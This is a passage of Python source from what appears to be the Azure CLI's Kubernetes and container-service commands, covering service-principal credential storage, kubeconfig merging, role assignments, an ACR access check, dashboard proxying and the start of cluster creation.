    # subscription in the CLI config dir, keyed by subscription id.
    obj = {}
    if client_secret:
        obj['client_secret'] = client_secret
    if service_principal:
        obj['service_principal'] = service_principal

    config_path = os.path.join(get_config_dir(), file_name)
    full_config = load_service_principals(config_path=config_path)
    if not full_config:
        full_config = {}
    full_config[subscription_id] = obj

    # 0o600: the file holds secrets, keep it owner read/write only.
    with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
                   'w+') as spFile:
        json.dump(full_config, spFile)


def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
    # Return the stored credentials dict for subscription_id, or None if absent.
    config_path = os.path.join(get_config_dir(), file_name)
    config = load_service_principals(config_path)
    if not config:
        return None
    return config.get(subscription_id)


def load_service_principals(config_path):
    # Best-effort read of the stored credentials file; any failure
    # (missing file, bad JSON) deliberately yields None rather than raising.
    if not os.path.exists(config_path):
        return None
    fd = os.open(config_path, os.O_RDONLY)
    try:
        with os.fdopen(fd) as f:
            return shell_safe_json_parse(f.read())
    except:  # pylint: disable=bare-except
        return None


def _invoke_deployment(cmd, resource_group_name, deployment_name, template, parameters,
                       validate, no_wait, subscription_id=None):
    # Validate or deploy the generated ARM template via the Resources SDK.
    from azure.cli.core.profiles import ResourceType
    DeploymentProperties = cmd.get_models('DeploymentProperties',
                                          resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
    properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
    smc = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
                                  subscription_id=subscription_id).deployments
    if validate:
        logger.info('==== BEGIN TEMPLATE ====')
        logger.info(json.dumps(template, indent=2))
        logger.info('==== END TEMPLATE ====')

    # Newer Resources API versions wrap the properties in a Deployment model.
    if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
        Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
        deployment = Deployment(properties=properties)

        if validate:
            validation_poller = smc.validate(resource_group_name, deployment_name, deployment)
            return LongRunningOperation(cmd.cli_ctx)(validation_poller)
        return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, deployment)

    if validate:
        return smc.validate(resource_group_name, deployment_name, properties)
    return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, properties)


def k8s_get_credentials(cmd, client, name, resource_group_name,
                        path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
                        ssh_key_file=None,
                        overwrite_existing=False):
    """Download and install kubectl credentials from the cluster master
    :param name: The name of the cluster.
    :type name: str
    :param resource_group_name: The name of the resource group.
:type resource_group_name: str :param path: Where to install the kubectl config file :type path: str :param ssh_key_file: Path to an SSH key file to use :type ssh_key_file: str """ acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name) _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing) def _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing): if ssh_key_file is not None and not os.path.isfile(ssh_key_file): raise CLIError('Private key file {} does not exist'.format(ssh_key_file)) dns_prefix = acs_info.master_profile.dns_prefix # pylint: disable=no-member location = acs_info.location # pylint: disable=no-member user = acs_info.linux_profile.admin_username # pylint: disable=no-member _mkdir_p(os.path.dirname(path)) path_candidate = path ix = 0 while os.path.exists(path_candidate): ix += 1 path_candidate = '{}-{}-{}'.format(path, name, ix) # TODO: this only works for public cloud, need other casing for national clouds acs_client.secure_copy(user, '{}.{}.cloudapp.azure.com'.format(dns_prefix, location), '.kube/config', path_candidate, key_filename=ssh_key_file) # merge things if path_candidate != path: try: merge_kubernetes_configurations(path, path_candidate, overwrite_existing) except yaml.YAMLError as exc: logger.warning('Failed to merge credentials to kube config file: %s', exc) logger.warning('The credentials have been saved to %s', path_candidate) def _handle_merge(existing, addition, key, replace): if not addition.get(key, False): return if not existing.get(key): existing[key] = addition[key] return for i in addition[key]: for j in existing[key]: if not i.get('name', False) or not j.get('name', False): continue if i['name'] == j['name']: if replace or i == j: existing[key].remove(j) else: msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?' 
overwrite = False try: overwrite = prompt_y_n(msg.format(i['name'])) except NoTTYException: pass if overwrite: existing[key].remove(j) else: msg = 'A different object named {} already exists in {} in your kubeconfig file.' raise CLIError(msg.format(i['name'], key)) existing[key].append(i) def load_kubernetes_configuration(filename): try: with open(filename) as stream: return yaml.safe_load(stream) except (IOError, OSError) as ex: if getattr(ex, 'errno', 0) == errno.ENOENT: raise CLIError('{} does not exist'.format(filename)) raise except (yaml.parser.ParserError, UnicodeDecodeError) as ex: raise CLIError('Error parsing {} ({})'.format(filename, str(ex))) def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None): existing = load_kubernetes_configuration(existing_file) addition = load_kubernetes_configuration(addition_file) if context_name is not None: addition['contexts'][0]['name'] = context_name addition['contexts'][0]['context']['cluster'] = context_name addition['clusters'][0]['name'] = context_name addition['current-context'] = context_name # rename the admin context so it doesn't overwrite the user context for ctx in addition.get('contexts', []): try: if ctx['context']['user'].startswith('clusterAdmin'): admin_name = ctx['name'] + '-admin' addition['current-context'] = ctx['name'] = admin_name break except (KeyError, TypeError): continue if addition is None: raise CLIError('failed to load additional configuration from {}'.format(addition_file)) if existing is None: existing = addition else: _handle_merge(existing, addition, 'clusters', replace) _handle_merge(existing, addition, 'users', replace) _handle_merge(existing, addition, 'contexts', replace) existing['current-context'] = addition['current-context'] # check that ~/.kube/config is only read- and writable by its owner if platform.system() != 'Windows': existing_file_perms = "{:o}".format(stat.S_IMODE(os.lstat(existing_file).st_mode)) if not 
existing_file_perms.endswith('600'):
            # Warn (don't fail) when the kubeconfig is readable by others.
            logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
                           existing_file, existing_file_perms)

    with open(existing_file, 'w+') as stream:
        yaml.safe_dump(existing, stream, default_flow_style=False)

    current_context = addition.get('current-context', 'UNKNOWN')
    msg = 'Merged "{}" as current context in {}'.format(current_context, existing_file)
    print(msg)


def _get_host_name(acs_info):
    """
    Gets the FQDN from the acs_info object.

    :param acs_info: ContainerService object from Azure REST API
    :type acs_info: ContainerService
    """
    if acs_info is None:
        raise CLIError('Missing acs_info')
    if acs_info.master_profile is None:
        raise CLIError('Missing master_profile')
    if acs_info.master_profile.fqdn is None:
        raise CLIError('Missing fqdn')
    return acs_info.master_profile.fqdn


def _get_username(acs_info):
    """
    Gets the admin user name from the Linux profile of the ContainerService object.
    Returns None when no Linux profile is present.

    :param acs_info: ContainerService object from Azure REST API
    :type acs_info: ContainerService
    """
    if acs_info.linux_profile is not None:
        return acs_info.linux_profile.admin_username
    return None


def _get_acs_info(cli_ctx, name, resource_group_name):
    """
    Gets the ContainerService object from Azure REST API.

    :param name: ACS resource name
    :type name: String
    :param resource_group_name: Resource group name
    :type resource_group_name: String
    """
    container_services = cf_container_services(cli_ctx, None)
    return container_services.get(resource_group_name, name)


def _rand_str(n):
    """
    Gets a random string of n lowercase letters and digits.
    """
    choices = string.ascii_lowercase + string.digits
    return ''.join(random.SystemRandom().choice(choices) for _ in range(n))


def _mkdir_p(path):
    # mkdir -p equivalent: ignore "already exists" for directories only.
    # http://stackoverflow.com/a/600612
    try:
        os.makedirs(path)
    except OSError as exc:  # Python >2.5
        if exc.errno == errno.EEXIST and os.path.isdir(path):
            pass
        else:
            raise


def update_acs(cmd, client, resource_group_name, container_service_name, new_agent_count):
    # Scale the first agent pool of an existing container service.
    instance = client.get(resource_group_name, container_service_name)
    instance.agent_pool_profiles[0].count = new_agent_count  # pylint: disable=no-member

    # null out the service principal because otherwise validation complains
    if instance.orchestrator_profile.orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes:
        instance.service_principal_profile = None

    # null out the windows profile so that validation doesn't complain about not having the admin password
    instance.windows_profile = None

    return client.create_or_update(resource_group_name, container_service_name, instance)


def list_container_services(cmd, client, resource_group_name=None):
    ''' List Container Services.
''' svc_list = client.list_by_resource_group(resource_group_name=resource_group_name) \ if resource_group_name else client.list() return list(svc_list) def show_service_principal(client, identifier): object_id = _resolve_service_principal(client, identifier) return client.get(object_id) def _resolve_service_principal(client, identifier): # todo: confirm with graph team that a service principal name must be unique result = list(client.list(filter="servicePrincipalNames/any(c:c eq '{}')".format(identifier))) if result: return result[0].object_id try: uuid.UUID(identifier) return identifier # assume an object id except ValueError: raise CLIError("service principal '{}' doesn't exist".format(identifier)) def create_application(client, display_name, homepage, identifier_uris, available_to_other_tenants=False, password=None, reply_urls=None, key_value=None, key_type=None, key_usage=None, start_date=None, end_date=None, required_resource_accesses=None): from azure.graphrbac.models import GraphErrorException password_creds, key_creds = _build_application_creds(password, key_value, key_type, key_usage, start_date, end_date) app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants, display_name=display_name, identifier_uris=identifier_uris, homepage=homepage, reply_urls=reply_urls, key_credentials=key_creds, password_credentials=password_creds, required_resource_access=required_resource_accesses) try: result = client.create(app_create_param, raw=True) return result.output, result.response.headers["ocp-aad-session-key"] except GraphErrorException as ex: if 'insufficient privileges' in str(ex).lower(): link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long raise CLIError("Directory permission is needed for the current user to register the application. " "For how to configure, please refer '{}'. 
Original error: {}".format(link, ex)) raise def update_application(client, object_id, display_name, homepage, identifier_uris, available_to_other_tenants=False, password=None, reply_urls=None, key_value=None, key_type=None, key_usage=None, start_date=None, end_date=None, required_resource_accesses=None): from azure.graphrbac.models import GraphErrorException password_creds, key_creds = _build_application_creds(password, key_value, key_type, key_usage, start_date, end_date) try: if key_creds: client.update_key_credentials(object_id, key_creds) if password_creds: client.update_password_credentials(object_id, password_creds) if reply_urls: client.patch(object_id, ApplicationUpdateParameters(reply_urls=reply_urls)) return except GraphErrorException as ex: if 'insufficient privileges' in str(ex).lower(): link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long raise CLIError("Directory permission is needed for the current user to register the application. " "For how to configure, please refer '{}'. 
Original error: {}".format(link, ex))
        raise


def _build_application_creds(password=None, key_value=None, key_type=None,
                             key_usage=None, start_date=None, end_date=None):
    """Build (password_credentials, key_credentials) for an AAD application.

    Exactly one of ``password`` / ``key_value`` may be set; dates default to
    now .. now+1 year and accept either datetimes or parseable strings.
    """
    if password and key_value:
        raise CLIError('specify either --password or --key-value, but not both.')

    if not start_date:
        start_date = datetime.datetime.utcnow()
    elif isinstance(start_date, str):
        start_date = dateutil.parser.parse(start_date)

    if not end_date:
        end_date = start_date + relativedelta(years=1)
    elif isinstance(end_date, str):
        end_date = dateutil.parser.parse(end_date)

    key_type = key_type or 'AsymmetricX509Cert'
    key_usage = key_usage or 'Verify'

    password_creds = None
    key_creds = None
    if password:
        password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
                                             key_id=str(uuid.uuid4()), value=password)]
    elif key_value:
        key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
                                   key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]

    return (password_creds, key_creds)


def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
    """Create a service principal for an AAD application.

    ``identifier`` may be an appId (GUID), an identifier URI, or — when
    ``resolve_app`` is False — the appId to use directly.
    """
    if rbac_client is None:
        rbac_client = get_graph_rbac_management_client(cli_ctx)

    if resolve_app:
        # A GUID identifier is treated as an appId; anything else as an
        # identifier URI.
        try:
            uuid.UUID(identifier)
            result = list(rbac_client.applications.list(filter="appId eq '{}'".format(identifier)))
        except ValueError:
            result = list(rbac_client.applications.list(
                filter="identifierUris/any(s:s eq '{}')".format(identifier)))

        if not result:  # assume we get an object id
            result = [rbac_client.applications.get(identifier)]
        app_id = result[0].app_id
    else:
        app_id = identifier

    return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))


def create_role_assignment(cli_ctx, role, assignee, is_service_principal, resource_group_name=None, scope=None):
    # Thin wrapper: only resolve the assignee to an object id when it is a
    # service principal name (otherwise it is already an MSI object id).
    return _create_role_assignment(cli_ctx, role, assignee, resource_group_name, scope,
                                   resolve_assignee=is_service_principal)


def _create_role_assignment(cli_ctx, role, assignee, resource_group_name=None,
                            scope=None, resolve_assignee=True):
    """Create an RBAC role assignment for ``assignee`` on ``scope``.

    ``role`` may be a role definition GUID or a role name (resolved against
    the scope); ``scope`` defaults from resource_group_name / subscription.
    """
    from azure.cli.core.profiles import ResourceType, get_sdk
    factory = get_auth_management_client(cli_ctx, scope)
    assignments_client = factory.role_assignments
    definitions_client = factory.role_definitions

    scope = _build_role_scope(resource_group_name, scope, assignments_client.config.subscription_id)
    role_id = _resolve_role_id(role, scope, definitions_client)

    # If the cluster has service principal resolve the service principal client id to get the object id,
    # if not use MSI object id.
    object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee

    RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
                                             'RoleAssignmentCreateParameters', mod='models',
                                             operation_group='role_assignments')
    parameters = RoleAssignmentCreateParameters(role_definition_id=role_id, principal_id=object_id)
    assignment_name = uuid.uuid4()
    custom_headers = None
    return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)


def _build_role_scope(resource_group_name, scope, subscription_id):
    # An explicit scope wins; otherwise scope to the resource group when
    # given, else the whole subscription.
    subscription_scope = '/subscriptions/' + subscription_id
    if scope:
        if resource_group_name:
            err = 'Resource group "{}" is redundant because scope is supplied'
            raise CLIError(err.format(resource_group_name))
    elif resource_group_name:
        scope = subscription_scope + '/resourceGroups/' + resource_group_name
    else:
        scope = subscription_scope
    return scope


def _resolve_role_id(role, scope, definitions_client):
    # Accept a role definition GUID as-is; otherwise look the name up at the
    # given scope and require exactly one match.
    role_id = None
    try:
        uuid.UUID(role)
        role_id = role
    except ValueError:
        pass
    if not role_id:  # retrieve role id
        role_defs = list(definitions_client.list(scope, "roleName eq '{}'".format(role)))
        if not role_defs:
            raise CLIError("Role '{}' doesn't exist.".format(role))
        if len(role_defs) > 1:
            ids = [r.id for r in role_defs]
            err = "More than one role matches the given name '{}'. 
Please pick a value from '{}'" raise CLIError(err.format(role, ids)) role_id = role_defs[0].id return role_id def _resolve_object_id(cli_ctx, assignee): client = get_graph_rbac_management_client(cli_ctx) result = None if assignee.find('@') >= 0: # looks like a user principal name result = list(client.users.list(filter="userPrincipalName eq '{}'".format(assignee))) if not result: result = list(client.service_principals.list( filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee))) if not result: # assume an object id, let us verify it result = _get_object_stubs(client, [assignee]) # 2+ matches should never happen, so we only check 'no match' here if not result: raise CLIError("No matches in graph database for '{}'".format(assignee)) return result[0].object_id def _get_object_stubs(graph_client, assignees): params = GetObjectsParameters(include_directory_object_references=True, object_ids=assignees) return list(graph_client.objects.get_objects_by_object_ids(params)) def _update_dict(dict1, dict2): cp = dict1.copy() cp.update(dict2) return cp def subnet_role_assignment_exists(cli_ctx, scope): network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7" factory = get_auth_management_client(cli_ctx, scope) assignments_client = factory.role_assignments for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'): if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id): return True return False def aks_check_acr(cmd, client, resource_group_name, name, acr): if not which("kubectl"): raise ValidationError("Can not find kubectl executable in PATH") _, browse_path = tempfile.mkstemp() aks_get_credentials( cmd, client, resource_group_name, name, admin=False, path=browse_path ) # Get kubectl minor version kubectl_minor_version = -1 try: cmd = f"kubectl version -o json --kubeconfig {browse_path}" output = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE) jsonS, _ = output.communicate() kubectl_version = 
json.loads(jsonS) kubectl_minor_version = int(kubectl_version["clientVersion"]["minor"]) kubectl_server_minor_version = int(kubectl_version["serverVersion"]["minor"]) kubectl_server_patch = int(kubectl_version["serverVersion"]["gitVersion"].split(".")[-1]) if kubectl_server_minor_version < 17 or (kubectl_server_minor_version == 17 and kubectl_server_patch < 14): logger.warning('There is a known issue for Kubernetes versions < 1.17.14 when connecting to ' 'ACR using MSI. See https://github.com/kubernetes/kubernetes/pull/96355 for' 'more information.') except subprocess.CalledProcessError as err: raise ValidationError("Could not find kubectl minor version: {}".format(err)) if kubectl_minor_version == -1: raise ValidationError("Failed to get kubectl version") podName = "canipull-" + str(uuid.uuid4()) overrides = { "spec": { "restartPolicy": "Never", "hostNetwork": True, "containers": [ { "securityContext": {"runAsUser": 0}, "name": podName, "image": CONST_CANIPULL_IMAGE, "args": ["-v6", acr], "stdin": True, "stdinOnce": True, "tty": True, "volumeMounts": [ {"name": "azurejson", "mountPath": "/etc/kubernetes"}, {"name": "sslcerts", "mountPath": "/etc/ssl/certs"}, ], } ], "tolerations": [ {"key": "CriticalAddonsOnly", "operator": "Exists"}, {"effect": "NoExecute", "operator": "Exists"}, ], "volumes": [ {"name": "azurejson", "hostPath": {"path": "/etc/kubernetes"}}, {"name": "sslcerts", "hostPath": {"path": "/etc/ssl/certs"}}, ], } } try: cmd = [ "kubectl", "run", "--kubeconfig", browse_path, "--rm", "--quiet", "--image", CONST_CANIPULL_IMAGE, "--overrides", json.dumps(overrides), "-it", podName, ] # Support kubectl versons < 1.18 if kubectl_minor_version < 18: cmd += ["--generator=run-pod/v1"] output = subprocess.check_output( cmd, universal_newlines=True, ) except subprocess.CalledProcessError as err: raise CLIError("Failed to check the ACR: {}".format(err)) if output: print(output) else: raise CLIError("Failed to check the ACR.") # pylint: 
# pylint: disable=too-many-statements,too-many-branches
def aks_browse(cmd, client, resource_group_name, name, disable_browser=False,
               listen_address='127.0.0.1', listen_port='8001'):
    """Open a browser onto the cluster's Kubernetes dashboard (or the Azure portal
    workloads view when the kube-dashboard addon is disabled or k8s >= 1.19.0).

    Runs ``kubectl proxy`` locally against a temporary kubeconfig and, outside
    Cloud Shell, opens the proxied dashboard URL in the default browser.
    """
    # verify the kube-dashboard addon was not disabled
    instance = client.get(resource_group_name, name)
    addon_profiles = instance.addon_profiles or {}
    # addon name is case insensitive
    addon_profile = next((addon_profiles[k] for k in addon_profiles
                          if k.lower() == CONST_KUBE_DASHBOARD_ADDON_NAME.lower()),
                         ManagedClusterAddonProfile(enabled=False))

    # open portal view if addon is not enabled or k8s version >= 1.19.0
    if StrictVersion(instance.kubernetes_version) >= StrictVersion('1.19.0') or (not addon_profile.enabled):
        subscription_id = get_subscription_id(cmd.cli_ctx)
        dashboardURL = (
            cmd.cli_ctx.cloud.endpoints.portal +  # Azure Portal URL (https://portal.azure.com for public cloud)
            ('/#resource/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService'
             '/managedClusters/{2}/workloads').format(subscription_id, resource_group_name, name)
        )
        if in_cloud_console():
            logger.warning('To view the Kubernetes resources view, please open %s in a new tab', dashboardURL)
        else:
            logger.warning('Kubernetes resources view on %s', dashboardURL)

        if not disable_browser:
            webbrowser.open_new_tab(dashboardURL)
        return

    # otherwise open the kube-dashboard addon
    if not which('kubectl'):
        raise CLIError('Can not find kubectl executable in PATH')

    # fetch cluster credentials into a throw-away kubeconfig for the proxy
    _, browse_path = tempfile.mkstemp()
    aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)

    # find the dashboard pod's name
    try:
        dashboard_pod = subprocess.check_output(
            ["kubectl", "get", "pods", "--kubeconfig", browse_path,
             "--namespace", "kube-system", "--output", "name",
             "--selector", "k8s-app=kubernetes-dashboard"],
            universal_newlines=True)
    except subprocess.CalledProcessError as err:
        raise CLIError('Could not find dashboard pod: {}'.format(err))
    if dashboard_pod:
        # remove any "pods/" or "pod/" prefix from the name
        dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
    else:
        raise CLIError("Couldn't find the Kubernetes dashboard pod.")

    # find the port
    try:
        dashboard_port = subprocess.check_output(
            ["kubectl", "get", "pods", "--kubeconfig", browse_path,
             "--namespace", "kube-system",
             "--selector", "k8s-app=kubernetes-dashboard",
             "--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"]
        )
        # output format: b"'{port}'"
        dashboard_port = int((dashboard_port.decode('utf-8').replace("'", "")))
    except subprocess.CalledProcessError as err:
        raise CLIError('Could not find dashboard port: {}'.format(err))

    # use https if dashboard container is using https
    if dashboard_port == 8443:
        protocol = 'https'
    else:
        protocol = 'http'

    proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
    dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
                                                                                                        protocol)
    # launch kubectl port-forward locally to access the remote dashboard
    if in_cloud_console():
        # TODO: better error handling here.
        response = requests.post('http://localhost:8888/openport/{0}'.format(listen_port))
        result = json.loads(response.text)
        dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
            result['url'], protocol)
        term_id = os.environ.get('ACC_TERM_ID')
        if term_id:
            response = requests.post('http://localhost:8888/openLink/{0}'.format(term_id),
                                     json={"url": dashboardURL})
        logger.warning('To view the console, please open %s in a new tab', dashboardURL)
    else:
        logger.warning('Proxy running on %s', proxy_url)

    logger.warning('Press CTRL+C to close the tunnel...')
    if not disable_browser:
        wait_then_open_async(dashboardURL)
    try:
        try:
            subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "proxy",
                                     "--address", listen_address, "--port", listen_port],
                                    stderr=subprocess.STDOUT)
        except subprocess.CalledProcessError as err:
            # NOTE(review): bytes.find() returns -1 (truthy) when the flag message is
            # absent, so this branch also triggers on other proxy failures — confirm
            # whether "err.output.find(b'unknown flag: --address') != -1" was intended.
            if err.output.find(b'unknown flag: --address'):
                if listen_address != '127.0.0.1':
                    logger.warning('"--address" is only supported in kubectl v1.13 and later.')
                    logger.warning('The "--listen-address" argument will be ignored.')
                subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy", "--port", listen_port])
    except KeyboardInterrupt:
        # Let command processing finish gracefully after the user presses [Ctrl+C]
        pass
    finally:
        if in_cloud_console():
            # NOTE(review): hardcoded port 8001 here, while openport above used
            # listen_port — confirm this is intentional for non-default ports.
            requests.post('http://localhost:8888/closeport/8001')


def _trim_nodepoolname(nodepool_name):
    """Return *nodepool_name* truncated to 12 chars, or "nodepool1" when empty/None."""
    if not nodepool_name:
        return "nodepool1"
    return nodepool_name[:12]


def _validate_ssh_key(no_ssh_key, ssh_key_value):
    """Raise CLIError when an SSH key is required but missing or not a valid RSA public key."""
    if not no_ssh_key:
        try:
            if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
                raise ValueError()
        except (TypeError, ValueError):
            shortened_key = truncate_text(ssh_key_value)
            raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))


def _add_monitoring_role_assignment(result, cluster_resource_id, cmd):
    """Grant 'Monitoring Metrics Publisher' on the cluster to its SP or omsagent MSI.

    Only logs warnings on failure; never raises.
    """
    service_principal_msi_id = None
    # Check if service principal exists, if it does, assign permissions to service principal
    # Else, provide permissions to MSI
    if (
            hasattr(result, 'service_principal_profile') and
            hasattr(result.service_principal_profile, 'client_id') and
            result.service_principal_profile.client_id.lower() != 'msi'
    ):
        logger.info('valid service principal exists, using it')
        service_principal_msi_id = result.service_principal_profile.client_id
        is_service_principal = True
    elif (
            (hasattr(result, 'addon_profiles')) and
            (CONST_MONITORING_ADDON_NAME in result.addon_profiles) and
            (hasattr(result.addon_profiles[CONST_MONITORING_ADDON_NAME], 'identity')) and
            (hasattr(result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity, 'object_id'))
    ):
        logger.info('omsagent MSI exists, using it')
        service_principal_msi_id = result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity.object_id
        is_service_principal = False

    if service_principal_msi_id is not None:
        if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
                                    service_principal_msi_id, is_service_principal,
                                    scope=cluster_resource_id):
            logger.warning('Could not create a role assignment for Monitoring addon. '
                           'Are you an Owner on this subscription?')
    else:
        # NOTE(review): missing space between 'role' and 'assignment' in this message.
        logger.warning('Could not find service principal or user assigned MSI for role'
                       'assignment')


def _add_ingress_appgw_addon_role_assignment(result, cmd):
    """Grant the AGIC addon identity the roles it needs on the gateway/subnet/vnet.

    Depending on which keys are present in the addon config, assigns
    'Contributor' on the Application Gateway's resource group, 'Network
    Contributor' on the configured subnet, and/or 'Contributor' on the node
    pool's virtual network. Only logs warnings on failure.
    """
    service_principal_msi_id = None
    # Check if service principal exists, if it does, assign permissions to service principal
    # Else, provide permissions to MSI
    if (
            hasattr(result, 'service_principal_profile') and
            hasattr(result.service_principal_profile, 'client_id') and
            result.service_principal_profile.client_id != 'msi'
    ):
        service_principal_msi_id = result.service_principal_profile.client_id
        is_service_principal = True
    elif (
            (hasattr(result, 'addon_profiles')) and
            (CONST_INGRESS_APPGW_ADDON_NAME in result.addon_profiles) and
            (hasattr(result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME], 'identity')) and
            (hasattr(result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].identity, 'object_id'))
    ):
        service_principal_msi_id = result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].identity.object_id
        is_service_principal = False

    if service_principal_msi_id is not None:
        config = result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config
        from msrestazure.tools import parse_resource_id, resource_id
        if CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID in config:
            appgw_id = config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID]
            parsed_appgw_id = parse_resource_id(appgw_id)
            appgw_group_id = resource_id(subscription=parsed_appgw_id["subscription"],
                                         resource_group=parsed_appgw_id["resource_group"])
            if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
                                        service_principal_msi_id, is_service_principal,
                                        scope=appgw_group_id):
                logger.warning('Could not create a role assignment for application gateway: %s '
                               'specified in %s addon. '
                               'Are you an Owner on this subscription?', appgw_id, CONST_INGRESS_APPGW_ADDON_NAME)
        if CONST_INGRESS_APPGW_SUBNET_ID in config:
            subnet_id = config[CONST_INGRESS_APPGW_SUBNET_ID]
            if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
                                        service_principal_msi_id, is_service_principal,
                                        scope=subnet_id):
                logger.warning('Could not create a role assignment for subnet: %s '
                               'specified in %s addon. '
                               'Are you an Owner on this subscription?', subnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
        if CONST_INGRESS_APPGW_SUBNET_CIDR in config:
            if result.agent_pool_profiles[0].vnet_subnet_id is not None:
                parsed_subnet_vnet_id = parse_resource_id(result.agent_pool_profiles[0].vnet_subnet_id)
                vnet_id = resource_id(subscription=parsed_subnet_vnet_id["subscription"],
                                      resource_group=parsed_subnet_vnet_id["resource_group"],
                                      namespace="Microsoft.Network",
                                      type="virtualNetworks",
                                      name=parsed_subnet_vnet_id["name"])
                if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
                                            service_principal_msi_id, is_service_principal,
                                            scope=vnet_id):
                    logger.warning('Could not create a role assignment for virtual network: %s '
                                   'specified in %s addon. '
                                   'Are you an Owner on this subscription?', vnet_id, CONST_INGRESS_APPGW_ADDON_NAME)


def _add_virtual_node_role_assignment(cmd, result, vnet_subnet_id):
    """Grant 'Contributor' on the subnet's parent VNet to the cluster SP or virtual-node MSI.

    Only logs warnings on failure; never raises.
    """
    # Remove trailing "/subnets/<SUBNET_NAME>" to get the vnet id
    vnet_id = vnet_subnet_id.rpartition('/')[0]
    vnet_id = vnet_id.rpartition('/')[0]

    service_principal_msi_id = None
    is_service_principal = False
    os_type = 'Linux'
    addon_name = CONST_VIRTUAL_NODE_ADDON_NAME + os_type
    # Check if service principal exists, if it does, assign permissions to service principal
    # Else, provide permissions to MSI
    if (
            hasattr(result, 'service_principal_profile') and
            hasattr(result.service_principal_profile, 'client_id') and
            result.service_principal_profile.client_id.lower() != 'msi'
    ):
        logger.info('valid service principal exists, using it')
        service_principal_msi_id = result.service_principal_profile.client_id
        is_service_principal = True
    elif (
            (hasattr(result, 'addon_profiles')) and
            (addon_name in result.addon_profiles) and
            (hasattr(result.addon_profiles[addon_name], 'identity')) and
            (hasattr(result.addon_profiles[addon_name].identity, 'object_id'))
    ):
        logger.info('virtual node MSI exists, using it')
        service_principal_msi_id = result.addon_profiles[addon_name].identity.object_id
        is_service_principal = False

    if service_principal_msi_id is not None:
        if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
                                    service_principal_msi_id, is_service_principal,
                                    scope=vnet_id):
            logger.warning('Could not create a role assignment for virtual node addon. '
                           'Are you an Owner on this subscription?')
    else:
        logger.warning('Could not find service principal or user assigned MSI for role'
                       'assignment')


# pylint: disable=too-many-statements,too-many-branches
def aks_create(cmd, client, resource_group_name, name, ssh_key_value,  # pylint: disable=too-many-locals
               dns_name_prefix=None,
               location=None,
               admin_username="azureuser",
               windows_admin_username=None,
               windows_admin_password=None,
               enable_ahub=False,
               kubernetes_version='',
               node_vm_size="Standard_DS2_v2",
               node_osdisk_type=None,
               node_osdisk_size=0,
               node_osdisk_diskencryptionset_id=None,
               node_count=3,
               nodepool_name="nodepool1",
               nodepool_tags=None,
               nodepool_labels=None,
               service_principal=None, client_secret=None,
               no_ssh_key=False,
               disable_rbac=None,
               enable_rbac=None,
               vm_set_type=None,
               skip_subnet_role_assignment=False,
               enable_cluster_autoscaler=False,
               cluster_autoscaler_profile=None,
               network_plugin=None,
               network_policy=None,
               uptime_sla=False,
               pod_cidr=None,
               service_cidr=None,
               dns_service_ip=None,
               docker_bridge_address=None,
